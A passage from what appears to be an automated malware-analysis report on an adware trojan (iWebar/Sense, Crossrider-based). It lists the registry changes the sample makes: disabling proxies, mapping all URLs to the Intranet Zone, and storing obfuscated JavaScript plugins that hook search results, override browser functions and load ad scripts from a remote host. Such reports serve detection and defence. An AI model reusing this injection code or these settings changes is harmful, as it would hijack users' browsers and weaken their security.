    "UNCAsIntranet" = "1"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    "ProxyBypass" = "1"

    The Trojan deletes the following registry key(s):

    [HKCU\Software\iWebar\Plugins\42]
    [HKCU\Software\iWebar\Plugins]
    [HKCU\Software\iWebar\Plugins\45]
    [HKCU\Software\iWebar\Plugins\9]
    [HKCU\Software\iWebar\Plugins\184]
    [HKCU\Software\iWebar\Plugins\183]
    [HKCU\Software\iWebar\Plugins\182]
    [HKCU\Software\iWebar\Plugins\1]
    [HKCU\Software\iWebar\Plugins\2]
    [HKCU\Software\iWebar\Plugins\3]
    [HKCU\Software\iWebar\Plugins\4]
    [HKCU\Software\iWebar\Plugins\7]
    [HKCU\Software\iWebar\Plugins\204]
    [HKCU\Software\iWebar\Plugins\22]
    [HKCU\Software\iWebar\Plugins\21]
    [HKCU\Software\iWebar\Plugins\207]
    [HKCU\Software\iWebar\Plugins\41]
    [HKCU\Software\iWebar\Plugins\223]
    [HKCU\Software\iWebar\Plugins\220]
    [HKCU\Software\iWebar\Plugins\28]
    [HKCU\Software\iWebar\Plugins\226]
    [HKCU\Software\iWebar\Plugins\44]
    [HKCU\Software\iWebar\Plugins\47]
    [HKCU\Software\iWebar\Plugins\46]
    [HKCU\Software\iWebar\Plugins\177]
    [HKCU\Software\iWebar\Plugins\155]
    [HKCU\Software\iWebar\Plugins\244]
    [HKCU\Software\iWebar\Plugins\246]
    [HKCU\Software\iWebar\Plugins\93]
    [HKCU\Software\iWebar\Plugins\91]
    [HKCU\Software\iWebar\Plugins\94]
    [HKCU\Software\iWebar\Plugins\195]
    [HKCU\Software\iWebar\Plugins\217]
    [HKCU\Software\iWebar\Plugins\78]
    [HKCU\Software\iWebar\Plugins\35]
    [HKCU\Software\iWebar\Plugins\36]
    [HKCU\Software\iWebar\Plugins\37]
    [HKCU\Software\iWebar\Plugins\38]
    [HKCU\Software\iWebar\Plugins\39]
    [HKCU\Software\iWebar\Plugins\64]
    [HKCU\Software\iWebar\Plugins\72]
    [HKCU\Software\iWebar\Plugins\102]
    [HKCU\Software\iWebar\Plugins\43]
    [HKCU\Software\iWebar\Plugins\40]
    [HKCU\Software\iWebar\Plugins\13]
    [HKCU\Software\iWebar\Plugins\104]
    [HKCU\Software\iWebar\Plugins\17]
    [HKCU\Software\iWebar\Plugins\14]

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"
    "ProxyServer"
    "ProxyOverride"

    The process iedw.exe:3480 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "F6 88 50 28 AA 2F 85 48 50 51 FC 83 5E 3D 48 24"

    The process Ixesxgrajdtli.exe:3116 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\InstalledBrowserExtensions\21836]
    "35510" = "iWebar"

    [HKLM\System\CurrentControlSet\Control\Session Manager]
    "PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv6.tmp\AccDownload.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv6.tmp\nsProcess.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv6.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy1B.tmp\extensionData\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy1B.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx23.tmp\extensionData\,"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fd85b73d-ae46-4924-ac3e-488e1f388fb3}]
    "AppPath" = "%Program Files%\iWebar"

    [HKLM\SOFTWARE\iWebar\Installer]
    "BundledIe" = "1"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{68362929-f19e-460f-a576-285813d75785}]
    "Policy" = "3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\iWebar]
    "DisplayName" = "iWebar"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "AppData" = "%Documents and Settings%\%current user%\Application Data"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{90390c9a-d825-4280-8463-3ddb9e1c6edf}]
    "Policy" = "3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\iWebar]
    "DisplayIcon" = "%Program Files%\iWebar\utils.exe"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{90390c9a-d825-4280-8463-3ddb9e1c6edf}]
    "AppName" = "iWebar-codedownloader.exe"

    [HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{dd1b4183-f36a-4489-9a68-4205a6801149}]
    "Bic" = "92F4CE5DE43B4200BD216411591F0444IE"
    "Verifier" = "cf88a6e798062720061920ae8ad681d4"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{68362929-f19e-460f-a576-285813d75785}]
    "AppPath" = "%Program Files%\iWebar"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fd85b73d-ae46-4924-ac3e-488e1f388fb3}]
    "AppName" = "iWebar-bg.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    "Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\iWebar]
    "Publisher" = "iWebar"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fd85b73d-ae46-4924-ac3e-488e1f388fb3}]
    "Policy" = "1"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
    "iWebar-bg.exe" = "8000"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\iWebar]
    "DisplayVersion" = "1.34.5.12"

    [HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{dd1b4183-f36a-4489-9a68-4205a6801149}]
    "pv" = "1.3.25.0"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{90390c9a-d825-4280-8463-3ddb9e1c6edf}]
    "AppName" = "iWebar-codedownloader.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\iWebar]
    "CrPublisherId" = "21836"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Common AppData" = "%Documents and Settings%\All Users\Application Data"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{90390c9a-d825-4280-8463-3ddb9e1c6edf}]
    "AppPath" = "%Program Files%\iWebar"

    [HKLM\SOFTWARE\GlobalUpdate\UpdateDev]
    "AuCheckPeriodMs" = "21600000"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fd85b73d-ae46-4924-ac3e-488e1f388fb3}]
    "Policy" = "1"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{68362929-f19e-460f-a576-285813d75785}]
    "AppName" = "iWebar-buttonutil.exe"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{90390c9a-d825-4280-8463-3ddb9e1c6edf}]
    "AppPath" = "%Program Files%\iWebar"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fd85b73d-ae46-4924-ac3e-488e1f388fb3}]
    "AppName" = "iWebar-bg.exe"

    [HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    [HKCU\Software\InstalledBrowserExtensions\iWebar]
    "35510" = "iWebar"

    [HKCU\Software\InstalledBrowserExtensions\21836\Status]
    "Installed" = "1"

    [HKLM\SOFTWARE\InstalledBrowserExtensions\21836\Status]
    "Installed" = "1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKCU\Software\InstalledBrowserExtensions\21836]
    "35510" = "iWebar"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fd85b73d-ae46-4924-ac3e-488e1f388fb3}]
    "AppPath" = "%Program Files%\iWebar"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\iWebar]
    "CrAppId" = "35510"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "15 B6 69 A2 02 9C 1D E8 86 AB 21 36 F8 48 2B 05"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{68362929-f19e-460f-a576-285813d75785}]
    "Policy" = "3"

    [HKLM\SOFTWARE\iWebar\Installer]
    "BundledFirefox" = "1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "MigrateProxy" = "1"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{90390c9a-d825-4280-8463-3ddb9e1c6edf}]
    "Policy" = "3"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
    "BaseClass" = "Drive"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{68362929-f19e-460f-a576-285813d75785}]
    "AppPath" = "%Program Files%\iWebar"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\iWebar]
    "UninstallString" = "%Program Files%\iWebar\Uninstall.exe /fcp=1"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\%current user%\Local Settings\History"

    [HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{dd1b4183-f36a-4489-9a68-4205a6801149}]
    "Name" = "iWebar"
    "srcid_var" = "000169"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{68362929-f19e-460f-a576-285813d75785}]
    "AppName" = "iWebar-buttonutil.exe"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "UNCAsIntranet" = "1"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    "ProxyBypass" = "1"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName" = "1"

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"
    "ProxyServer"
    "ProxyOverride"

    The process Sense-codedownloader.exe:3148 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKCU\Software\Sense\Plugins\7]
    "JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"

    [HKCU\Software\Sense\Code]
    "AppJavaScript" = " /************************************************************************************ This is your Page Code. The appAPI.ready() code block will be executed on every page load. For more information please visit our docs site: http://docs.crossrider.com*************************************************************************************/appAPI.ready(function($) { // Place your code here (you can also define new functions above this scope) // The $ object is the extension's jQuery object // alert(My new Crossrider extension works! The current page is: document.location.href);});"

    [HKCU\Software\Sense\Installer]
    "FullVersionForUrl" = "1_34_05_12"

    [HKCU\Software\Sense\Plugins\3]
    "JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

    [HKCU\Software\Sense\Plugins\155]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MDM2MjdiNTUwMzFkMGUwODIxMDYxNDRhNDg1NzQ5MDEwZTBjMDQ0ZTU3NDcxMTFiMDAwNDE1MTY1YTE3MTcwNTVkMTYwZjNhMWYwYTAyMTE1NzBmMTcwMzNmMDgxZDQ3MTcxZDFjNTUyZDI4MjgzYjM1MmIyNzI2MzEyYzM3MjUzNDNhMmYzYTJiM2QzYzM3MmQ1MTFiMDAxZTQ1MzcyNjJiM2EzNjI1NGQxZDAzMDgxMTQ5MTEwNjE4MTIwODFkNTg1NDdlN2Q1YTE4MWUwMjBjMDAxNDMxMTA1NjQyNDg0MzQyNWU0NTcwNTg1NDU0NTg0YTA0MTIxOTFkMTMxYjE1MTg1YTUyNTIyYzQ5MTkxNTA4MDc1NjI1NjIwZg==', 'xhrwkizxtt'); }"

    [HKCU\Software\Sense\Plugins\9]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/searchengines_hook.js"

    [HKCU\Software\Sense\Plugins\207]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=$jquery_171;function c(f){return true;}function b(g,f){f=appAPI.utils.isFunction(f)?f:c;return d.map(g,function(h){return f(h)?h:null;});}function a(f){f.getList=(function(){var g=f.getList;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.getKeys=(function(){var g=f.getKeys;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.removeAll=(function(){var g=f.removeAll;return function(h){if(!appAPI.utils.isObject(h)){return g.call(f);}d.each(f.getList(h),function(j,k){f.remove(k.key);});};}());}function e(g){g.getList=(function(){var h=g.getList;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callback)){return;}h.call(g,function(j){i.callback(b(j,i.predicate));});};}());g.getKeys=(function(){var h=g.getKeys;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callbac矯["

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Common AppData" = "%Documents and Settings%\All Users\Application Data"

    [HKCU\Software\Sense\Plugins\123]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/intext_adv_m.js"

    [HKCU\Software\Sense\Plugins\42]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEInternal.js"

    [HKCU\Software\Sense\Plugins\91]
    "Version" = "47"

    [HKCU\Software\Sense\Plugins\45]
    "Name" = "IEOnRequest"

    [HKLM\SOFTWARE\Sense\IE]
    "TotalProfiles" = "1"

    [HKCU\Software\Sense\Plugins\78]
    "Name" = "CrossriderInfo"

    [HKCU\Software\Sense\Plugins\94]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEPopup.js"

    [HKCU\Software\Sense\Plugins\223]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/imonomy_m.js"

    [HKCU\Software\Sense\Plugins\3]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie8_fix_2.js"

    [HKCU\Software\Sense\Plugins\211]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWY2MTdhNDEwZDEwMTEwNzIxMDUwODQ5NDk0MzQ3MGMxMTAzMDQ0ZDRiNDQxMjEwMTcxMjQ4MTY1YTE2MGYwYTFlMDIwYzBjMDE1OTFhMTIxMDQ0MDAwNzRhNTU1MjQ3NDQ1ODU1NWI0NzU2NGIwZTE2NTU1ODdkNmQ0OTFiMTcxMTE0MTYyMjA2MWI0NjUxNTM0MTBkMTAxMTA3MDc0ZDRiNDQxMjEwMTcxMjQ4MTY1YTE2MGYwYTFlMDIwYzBjMDE1OTFhMTIxMDQ0MDAwNzRhNTU1MjQ3NDQ1ODU1NWI0NzU2NGIwZTE2NTU1ODdkNmQ0OTAzMGYxMDAzMGMxOTNkMTM0NjUxNTM1MTU0NTU0OTdkNTQ1NzQ0NGI1MTE1MDAxNjExMWUxNzE2MDg0OTQ5NDMzZTQ2MDQxMzA3NTUzOTQ3Nzk0MzQ1NDQ0NTU1MWQxOTA4MDIxZDA2MmYzNzQ3NGQ1NDU1MTMwMjFkMDcwYTEzNGIyODA2MDExZTVhNDQ1MzU1MWM1NDQ3NDA0MjQ0NTY1MzE4NDU0MzE1MDIxNjFiMGQxODFiMDYxNzNiMTYwMjE2MWUwMDRjNDk0MzQyM2IzYTM0MjYzODM3MzgyMTJhMjEyMTM3MjgzODNlMjMyMzI3M2MzNjMxMjcyODNkMzMzYjM0NTQ0MzRlNDQ0MjQ3NDQ0NzU0NWI0MzUzNTU1NDU1NDc1MzBhNWY0OTc5MWU=', 'dkscedewtw'); }"

    [HKCU\Software\Sense\Plugins\242]
    "Version" = "3"

    [HKCU\Software\Sense\Plugins\155]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/ibario_pops_m.js"

    [HKCU\Software\Sense\Plugins\220]
    "Name" = "icm_base_m"

    [HKCU\Software\Sense\Plugins\14]
    "JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n<10?0 n:n;}if(typeof Date.prototype.to_CR_JSON!==function){Date.prototype.to_CR_JSON=function(key){return isFinite(this.valueOf())?this.getUTCFullYear() - f(this.getUTCMonth() 1) - f(this.getUTCDate()) T f(this.getUTCHours()) : f(this.getUTCMinutes()) : f(this.getUTCSeconds()) Z:null;};String.prototype.to_CR_JSON=Number.prototype.to_CR_JSON=Boolean.prototype.to_CR_JSON=function(key){return this.valueOf();};}var cx=/[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,escapable=/[\\\\x00-\x1f\x7f-["

    [HKCU\Software\Sense\Plugins\13]
    "Name" = "CrossriderAppUtils"

    [HKCU\Software\Sense\Plugins\36]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eve["

    [HKCU\Software\Crossrider]
    "Verifier" = "06a66a2d5edd8e17cc634fade0ffd159"

    [HKCU\Software\Sense\Plugins\230]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWM2ZDZmNDQwNzExMTMxZDI3MWIwYjQ1NWM0NjRkMGQxMzE5MDI1MzQ4NDgwNzE1MWQxMzRhMGM1YzA4MGMwNjBiMDcwNjBkMDM0MzFjMGMxMzQ4MTUwMjQwNTQ1MDVkNDI0NjU2NTc1MjUwNDEwZjE0NGY1ZTYzNmU0NTBlMTIxYjE1MTQzODAwMDU0NTVkNDY0NDA3MTExMzFkMDE1MzQ4NDgwNzE1MWQxMzRhMGM1YzA4MGMwNjBiMDcwNjBkMDM0MzFjMGMxMzQ4MTUwMjQwNTQ1MDVkNDI0NjU2NTc1MjUwNDEwZjE0NGY1ZTYzNmU0NTE2MGExYTAyMGUwMzNiMGQ0NTVkNDY1NDVjNTU0YjY3NTI0OTQ3NDc0NDEwMGExNzEzMDQxMTA4MGI0NTVjNDYzNDQ3MDYwOTAxNGIzYTRiNmM0NjRmNDU0NzRmMWIwNzBiMGUwODAzMjUzNjQ1NTc1MjRiMTAwZTA4MDIwMDEyNDkzMjAwMWYxZDU2NTE1NjVmMWQ1NjVkNDY1ZjQ3NWE0NjFkNGY0MjE3MTgxMDA1MGUxNDBlMDMxZDNhMTQxODEwMDAwMzQwNWM0NjQ4M2EzODJlMjAyNjM0MzQzNDJmMmIyMDM1MzIzZTIwMjAyZjMyMzkzYzMwMjUzMjNiMmQzODM4NDE0NjQ0NDU0MDVkNDI1OTU3NTc1NjU2NWY1NTU3NWQ1NTE0NWM0NTZjMWI=', 'ggffoegmri'); }"

    [HKCU\Software\Sense\Manifest]
    "Version" = "55"

    [HKCU\Software\Sense\Plugins\195]
    "Name" = "icm_convertmedia_m"

    [HKCU\Software\Sense\Plugins\7]
    "Name" = "hooks"

    [HKCU\Software\Sense\Plugins\195]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/icm_convertmedia_m.js"

    [HKCU\Software\Sense\Plugins\38]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberO["

    [HKCU\Software\Sense\Plugins\177]
    "Name" = "crossriderDashboard"

    [HKCU\Software\Sense\Plugins\103]
    "URL" = "http://js.clientstatsservice.com/plugins/javascripts/monetization/geo/intext_5_m.js"

    [HKCU\Software\Sense\Plugins\223]
    "Name" = "imonomy_m"

    [HKCU\Software\Sense\Manifest]
    "UninstallerOfferUrl" = "NA"

    [HKLM\SOFTWARE\Sense\IE\Profiles]
    "S-1-5-21-1844237615-1960408961-1801674531-1003" = "1"

    [HKCU\Software\Sense\Installer]
    "srcid" = "000803"

    [HKCU\Software\Sense\Plugins\94]
    "Name" = "IEPopup"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 25 00 00 00 01 00 00 00 00 00 00 00"

    [HKCU\Software\Sense\Plugins\37]
    "Name" = "IEBrowserEvents"

    [HKCU\Software\Sense\Installer]
    "subid" = "0"

    [HKCU\Software\Sense\Plugins\21]
    "Version" = "5"

    [HKCU\Software\Sense\Plugins\226]
    "URL" = "http://js.clientstatsservice.com/plugins/javascripts/monetization/geo/set_campaign_id_m.js"

    [HKCU\Software\Sense\Plugins\78]
    "Version" = "5"

    [HKCU\Software\Sense\Plugins\183]
    "Version" = "4"

    [HKCU\Software\Sense\Plugins\47]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/resources_background.js"

    [HKCU\Software\Sense\Plugins\45]
    "Version" = "4"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"

    [HKCU\Software\Sense\Plugins\9]
    "JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:'

  • '});this.addEngine({name:bing,url:bing.com,input:input[name=q],results:#results > ul,result:'
  • '});this.addEngine({name:yandex,url:yandex.ru,input:form.b-head-search input.b-form-input__input,form.b-search input.b-form-input__input,results:.b-body-items > ol,result:'
  • '});this.addEngine({name:yandex,url:yandex.com,input:form.b-search input.b-form-input__input,#searchInput,results:.b-serp2-list__portion,result:'
    '});this.addEngine({name:yahoo,url:yahoo.com,input:input[name=p],results:#web ol:eq(0),result:
  • });this.addEngine({name:yahoo,url:search.yahoo.com,input:input[name=p],results:#web ol:eq(0),result:
  • });this.addEngine({name:ask,urlY["

    [HKCU\Software\Sense\Manifest]
    "RunInFrame" = "false"
    "PublisherName" = "Object Browser"

    [HKCU\Software\Sense\Plugins\1]
    "Name" = "base"

    [HKCU\Software\Sense\Plugins\103]
    "JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[103] = function() { if (!appAPI.internal.monetization.shouldRunByVertical(103, [intext])){ return; } var subId = appAPI.internal.monetization.getSubId(); subId = subId.substr(0,7) 00000000000; var _GPL_loader = { vars: {}, ivars: {}, proto: appAPI.dom.isHttps() ? https:// : http://, baseCDN: cdncache1-a.akamaihd.net, init: function() { var a = ; $jquery.each(this.vars, function(b, c) { a = b = c &"

    [HKCU\Software\Sense\Plugins\17]
    "Version" = "4"

    [HKCU\Software\Sense\Update]
    "LastCheck" = "1401908126"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "MigrateProxy" = "1"

    [HKCU\Software\Sense\Plugins\44]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEMisc.js"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\%current user%\Local Settings\History"

    [HKCU\Software\Sense\Plugins\9]
    "Name" = "search_engine_hook"

    [HKCU\Software\Sense\Plugins\93]
    "Version" = "10"

    [HKCU\Software\Sense\Plugins\41]
    "JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    [HKCU\Software\Sense\Plugins\207]
    "Version" = "2"

    [HKCU\Software\Sense\Plugins\40]
